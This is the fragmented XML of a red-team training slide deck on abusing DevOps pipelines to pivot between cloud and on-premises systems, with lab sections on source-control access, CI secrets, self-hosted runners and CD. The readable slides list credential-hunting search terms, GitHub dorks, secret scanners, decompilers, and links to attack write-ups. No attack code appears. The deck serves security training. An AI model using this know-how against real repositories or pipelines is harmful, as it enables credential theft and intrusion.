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3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId70"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="296" r:id="rId12"/>
    <p:sldId id="285" r:id="rId13"/>
    <p:sldId id="292" r:id="rId14"/>
    <p:sldId id="299" r:id="rId15"/>
    <p:sldId id="314" r:id="rId16"/>
    <p:sldId id="315" r:id="rId17"/>
    <p:sldId id="318" r:id="rId18"/>
    <p:sldId id="317" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="324" r:id="rId21"/>
    <p:sldId id="302" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="307" r:id="rId24"/>
    <p:sldId id="349" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="308" r:id="rId27"/>
    <p:sldId id="325" r:id="rId28"/>
    <p:sldId id="309" r:id="rId29"/>
    <p:sldId id="311" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="345" r:id="rId33"/>
    <p:sldId id="321" r:id="rId34"/>
    <p:sldId id="319" r:id="rId35"/>
    <p:sldId id="320" r:id="rId36"/>
    <p:sldId id="350" r:id="rId37"/>
    <p:sldId id="306" r:id="rId38"/>
    <p:sldId id="322" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="353" r:id="rId41"/>
    <p:sldId id="354" r:id="rId42"/>
    <p:sldId id="326" r:id="rId43"/>
    <p:sldId id="356" r:id="rId44"/>
    <p:sldId id="355" r:id="rId45"/>
    <p:sldId id="357" r:id="rId46"/>
    <p:sldId id="364" r:id="rId47"/>
    <p:sldId id="365" r:id="rId48"/>
    <p:sldId id="366" r:id="rId49"/>
    <p:sldId id="367" r:id="rId50"/>
    <p:sldId id="368" r:id="rId51"/>
    <p:sldId id="369" r:id="rId52"/>
    <p:sldId id="370" r:id="rId53"/>
    <p:sldId id="371" r:id="rId54"/>
    <p:sldId id="372" r:id="rId55"/>
    <p:sldId id="373" r:id="rId56"/>
    <p:sldId id="374" r:id="rId57"/>
    <p:sldId id="375" r:id="rId58"/>
    <p:sldId id="376" r:id="rId59"/>
    <p:sldId id="377" r:id="rId60"/>
    <p:sldId id="378" r:id="rId61"/>
    <p:sldId id="379" r:id="rId62"/>
    <p:sldId id="380" r:id="rId63"/>
    <p:sldId id="381" r:id="rId64"/>
    <p:sldId id="327" r:id="rId65"/>
    <p:sldId id="359" r:id="rId66"/>
    <p:sldId id="358" r:id="rId67"/>
    <p:sldId id="361" r:id="rId68"/>
    <p:sldId id="388" r:id="rId69"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId71"/>
      <p:bold r:id="rId72"/>
      <p:italic r:id="rId73"/>
      <p:boldItalic r:id="rId74"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Telegraf" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Telegraf Bold" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId76"/>
      <p:bold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C94560A-3C3D-8F4E-853B-85954858E600}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="281"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SCM - Initial Access" id="{B1080D54-9923-324B-A168-071A7D129FC9}">
          <p14:sldIdLst>
            <p14:sldId id="282"/>
            <p14:sldId id="296"/>
            <p14:sldId id="285"/>
            <p14:sldId id="292"/>
            <p14:sldId id="299"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SCM - Lab 01 - Initiial Access" id="{5950A505-E927-0843-8986-DC75AEACB374}">
          <p14:sldIdLst>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="318"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CI" id="{13A05FC5-E14E-9C41-94A2-162D98A253A0}">
          <p14:sldIdLst>
            <p14:sldId id="317"/>
            <p14:sldId id="297"/>
            <p14:sldId id="324"/>
            <p14:sldId id="302"/>
            <p14:sldId id="301"/>
            <p14:sldId id="307"/>
            <p14:sldId id="349"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CI - Lab 02 - Secrets" id="{648B6C91-560F-0D4E-8C0F-CC61A1D70773}">
          <p14:sldIdLst>
            <p14:sldId id="293"/>
            <p14:sldId id="308"/>
            <p14:sldId id="325"/>
            <p14:sldId id="309"/>
            <p14:sldId id="311"/>
            <p14:sldId id="312"/>
            <p14:sldId id="313"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CI - Code Execution" id="{6ED72C5C-AD49-464F-863F-4290F9E02E79}">
          <p14:sldIdLst>
            <p14:sldId id="345"/>
            <p14:sldId id="321"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
            <p14:sldId id="350"/>
            <p14:sldId id="306"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CI - Lab 3 - Self-hosted runner" id="{321BE04E-85A0-0741-886A-F67EBD19A87E}">
          <p14:sldIdLst>
            <p14:sldId id="322"/>
            <p14:sldId id="323"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="326"/>
            <p14:sldId id="356"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CD" id="{4C20E618-B235-654A-8E43-16EB1B1103E8}">
          <p14:sldIdLst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</p14:sldIdLst>
        </p14:section>
        <p14:section name="CD - Lab 4" id="{AE3A119B-FC8C-BB4D-A49C-ADF55DA0E992}">
          <p14:sldIdLst>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Pivots" id="{76A9F266-3326-7F45-94CE-A64C21D12A2F}">
          <p14:sldIdLst>
            <p14:sldId id="327"/>
            <p14:sldId id="359"/>
            <p14:sldId id="358"/>
            <p14:sldId id="361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01C115-B8EA-BD8C-901C-BD31A3E444D0}" name="Zhu, Colbert" initials="ZC" userId="S::colbert.zhu@accenture.com::18ccba6d-bc68-4fe5-ba21-cd3ee60c24b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1" autoAdjust="0"/>
    <p:restoredTop sz="89252" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="76" d="100"/>
          <a:sy n="76" d="100"/>
        </p:scale>
        <p:origin x="8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4.fntdata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microsoft.com/office/2018/10/relationships/authors" Target="author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7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2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3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6.fntdata"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font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173F7-5DFA-2940-816D-28B835E1C7AF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09D73-BFE3-B34C-900C-9411FB133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54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43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15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31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89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35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64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49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00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96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64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1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5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71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17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5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56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24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518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164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987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693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840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241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394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040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8824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1949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034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0837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07869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057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9737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857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958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4560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0154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261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3119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0780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0547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1180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804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86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73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014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452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79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136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89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95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2DCD-2A3B-434C-819E-3923CD660AD2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6F1C-FA5A-1248-AE18-4221B641F308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B206E-D6BE-5B4C-921E-8CD84B3969A5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D8B7E-13DC-3D4D-A302-AB2951BF358E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66207-F276-5F46-8511-6B14B76A3548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41580-CF0C-C541-A226-E50CFBF0B924}" type="datetime1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5D1FE-A435-DA42-B9FD-96B6ADD778CB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/9/24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7E90-B790-7F4B-B086-A97C25F4947F}" type="datetime1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86F3-492B-144B-8D2F-BDE17CF8FACC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/9/24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347F0-5CF6-8141-97A3-EA2B8A63CAA5}" type="datetime1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89B35-19EB-7047-B6DF-EA32F28E2685}" type="datetime1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A5D09-E3E1-AF41-B754-F41F4B7C1609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hyperlink" Target="https://github.com/sharpbets/materials/slides/Abusing-DevOps-RTV.pptx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jfrog.com/blog/leaked-pypi-secret-token-revealed-in-binary-preventing-suppy-chain-attack/" TargetMode="External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hyperlink" Target="https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitrob" TargetMode="External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gitleaks/gitleaks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s://github.com/trufflesecurity/trufflehog" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/techgaun/github-dorks" TargetMode="Externa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0.sv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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://chatgpt.com/g/g-KmHJWgkGB-gitl-api-bot" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://chatgpt.com/g/g-qA09Y3Qux-gith-api-bot" TargetMode="External"/><Relationship Id="rId1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nielmiessler/fabric" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rbpai.net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0.sv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46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.sv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2.svg"/><Relationship Id="rId7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arpbets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49.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.toolnb.com/tools-lang-en/pyc.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sharpbets/materials/slides/Abusing-DevOps-RTV.pdf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github.com/user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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.github.com/user/repos" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.github.com/user/memberships/orgs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29.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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ccenture/jenkins-attack-framewo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54.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/nerd-for-tech/jenkins-attack-framework-40b7ce628e78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bishopfox.com/blog/poisoned-pipeline-attack-execution-a-look-at-ci-cd-environments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st.github.com/br3ndonland/f9c753eb27381f97336aa21b8d932be6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karimrahal.com/2023/01/05/github-actions-leaking-secrets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arpbets/utils/github/debug.yml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arpbets/sharpbets-app-dev/actions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hyperlink" Target="https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/jobs/JOB_ID/logs" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/runs/RUN_ID/jobs" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.github.com/repos/sharpbets/sharpbets-app-dev/actions/run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roadmap.sh/devops" TargetMode="External"/><Relationship Id="rId4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5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johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter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63.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9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acktiv/octosca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lolbas-project.github.io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hyperlink" Target="https://gtfobins.github.io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aetorian-inc/gato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arpbets/sharpbets-app-prod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arpbets/sharpbets-app-prod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arpbets/sharpbets-app-prod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arpbets/sharpbets-app-prod/actions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36.png"/><Relationship Id="rId9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1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sv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80.svg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Relationship Id="rId9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arpbets/materials/blob/main/lab04-ADO/azure-pipelines-LAB_SOLUTION.yaml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9.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9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Relationship Id="rId9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1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Relationship Id="rId9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29.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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hackingthe.cloud/terraform/terraform_enterprise_metadata_service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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId9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105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hyperlink" Target="https://github.com/sharpbets/materials/slides/Abusing-DevOps-RTV.pptx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5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.sv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sv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779136">
            <a:off x="-3098569" y="-7869264"/>
            <a:ext cx="18355375" cy="14917914"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18355375" h="14917914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79136">
            <a:off x="6702128" y="3382569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6919368"/>
            <a:ext cx="4117290" cy="97318"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4117290" h="97318">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4117290" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4117290" y="97318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="973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9220283"/>
            <a:ext cx="3177688" cy="563420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3177688" h="563420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3177688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177688" y="563420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5634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7507269"/>
            <a:ext cx="14144439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6"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Tom Porter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Colbert Zhu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954208"/>
            <a:ext cx="13642183" cy="168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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="623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ABUSING DEVOPS TO PIVOT BETWEEN CLOUD AND ON-PREM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15184025" y="7157724"/>
            <a:ext cx="3114861" cy="2926080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3878944" h="3643857">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3878945" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3878945" y="3643857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36438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337DF4A1-3411-9F5F-83F0-438E973E1AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071780" y="338483"/>
            <a:ext cx="14144439" cy="4103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311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Slides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2311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311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311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311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311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8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8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r>
              <a:rPr lang="en-US" sz="28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Telegraf"/>
                <a:ea typeface="Telegraf"/>
                <a:cs typeface="Telegraf"/>
                <a:sym typeface="Telegraf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https://github.com/sharpbets/materials/slides/Abusing-DevOps-RTV.pptx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Telegraf"/>
                <a:ea typeface="Telegraf"/>
                <a:cs typeface="Telegraf"/>
                <a:sym typeface="Telegraf"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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997EFF-AB9E-0F00-4392-0A23EC89E1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3593" y="919006"/>
            <a:ext cx="2380814" cy="23956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Credential Hunting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961868"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="57268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List of search terms (pass, basic, authorization)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 search dorks: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https://github.com/techgaun/github-dorks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Repositories and commit histories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Trufflehog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-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https://github.com/trufflesecurity/trufflehog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GitLeaks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-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https://github.com/gitleaks/gitleaks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GitRob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-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https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitrob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Disassembling/Decompiling/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Deobfuscating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Tools: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dotPeek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,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dnSpy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,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ILSpy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, JD-GUI,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Ghidra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, IDA,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uncompyle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https://jfrog.com/blog/leaked-pypi-secret-token-revealed-in-binary-preventing-suppy-chain-attack/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F0000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9274883">
            <a:off x="2918771" y="7986523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7660507" flipV="1">
            <a:off x="14104167" y="5868952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11">
              <a:alphaModFix amt="6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5013036B-7BEA-DEA3-37A8-EB0BEFC72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616778"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11066036" y="2447925"/>
          <a:ext cx="6193264" cy="482600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="298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5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921">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199" dirty="0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Search strategies</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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ts val="3839"/>
                        </a:lnSpc>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3199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It’s a target-rich environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100"/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C76A49B-1C98-4703-5C8B-C6821A3BD91E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2" descr="JFrog - All Things Open 2021">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD63DDA4-6520-0405-8891-3F052AAB6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15650"/>
            <a:ext cx="32511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458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90888" flipV="1">
            <a:off x="507868" y="-1653295"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926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9955175" flipV="1">
            <a:off x="1734305" y="8697504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B3BD47-FB6F-C15F-E7CD-E2B82D4C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8BA4E0-A2E7-C88C-8FEA-53075FE79C70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F85A12-7A2F-DD64-2672-41AFA166EC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037" y="3896971"/>
            <a:ext cx="8310763" cy="6177464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="62276"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic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C8C6A267-78AB-A9D1-CB13-730DB505E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75373"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-80643" y="1376362"/>
          <a:ext cx="12416053" cy="2120105"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="12416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20105">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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GitHub API Bot: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https://chatgpt.com/g/g-qA09Y3Qux-gith-api-bot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GitLab API Bot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https://chatgpt.com/g/g-KmHJWgkGB-gitl-api-bot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304800" y="235590"/>
            <a:ext cx="6781800" cy="1174109"/>
            <a:chOff x="0" y="57151"/>
            <a:chExt cx="9042399" cy="3242988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="57151"/>
              <a:ext cx="9042399" cy="13523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78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Custom GPTs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3170188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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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B6CC57-3F4D-DA26-C34F-0BA4F52996D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9049566" y="235590"/>
            <a:ext cx="9046142" cy="9838845"/>
            <a:chOff x="9049566" y="235590"/>
            <a:chExt cx="9046142" cy="98388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72E00BF-57C0-DAE1-C628-6A15549D5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49566" y="235590"/>
              <a:ext cx="9046142" cy="9838845"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="F44747">
                  <a:alpha val="62276"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Graphic 17" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A5BADD7-B67A-762B-6E54-AA4A044E3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6521" t="68029" r="7681" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9372600" y="6340880"/>
              <a:ext cx="1524000" cy="250420"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Graphic 18" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4C4769-21E1-5D91-7DC6-89C056891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6521" t="68029" r="7681" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10896600" y="6340880"/>
              <a:ext cx="1524000" cy="250420"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Graphic 19" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80F09E9-E7DC-164A-A0C2-AD6E351E4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6521" t="68029" r="7681" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12420600" y="6340880"/>
              <a:ext cx="1524000" cy="250420"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Graphic 20" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A601EE7B-EF22-B391-9F26-FEDE15B25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6521" t="68029" r="7681" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13944600" y="6340880"/>
              <a:ext cx="1524000" cy="250420"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Graphic 21" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114F21EF-E7D8-F15F-C46F-2273D3D12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6521" t="68029" r="7681" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="15468600" y="6340880"/>
              <a:ext cx="1524000" cy="250420"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Graphic 22" descr="Wave outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC99A76-17B2-BF5E-4A00-1A8C1ED22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6520" t="68029" r="57445" b="21971"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="16992600" y="6340880"/>
              <a:ext cx="640080" cy="250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2377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805126" flipV="1">
